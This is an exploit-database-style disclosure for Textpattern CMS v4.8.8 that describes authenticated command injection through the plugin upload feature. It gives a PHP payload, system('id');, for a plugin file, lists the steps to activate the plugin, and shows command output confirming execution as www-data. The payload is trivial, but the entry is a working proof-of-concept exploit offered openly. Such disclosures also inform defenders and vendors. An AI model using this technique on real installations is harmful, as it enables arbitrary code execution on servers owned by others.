# Exploit Title: Textpattern CMS v4.8.8 - Command Injection (Authenticated)
# Date: 2023-06-15
# Exploit Author: tmrswrr
# Vendor Homepage: https://textpattern.com/
# Software Link: https://textpattern.com/file_download/118/textpattern-4.8.8.zip
# Version: v4.8.8
# Tested : https://release-demo.textpattern.co/


--- Description ---

Textpattern CMS Upload Plugin Command Injection:
1) Login admin page , choose Plugin , Choose command.php file inside this payload: : 
system('id');
2) Save it and do Active plugin yes and click Update from disk
3) After open page you will see result: 
https://release-demo.textpattern.co/
uid=33(www-data) gid=33(www-data) groups=33(www-data)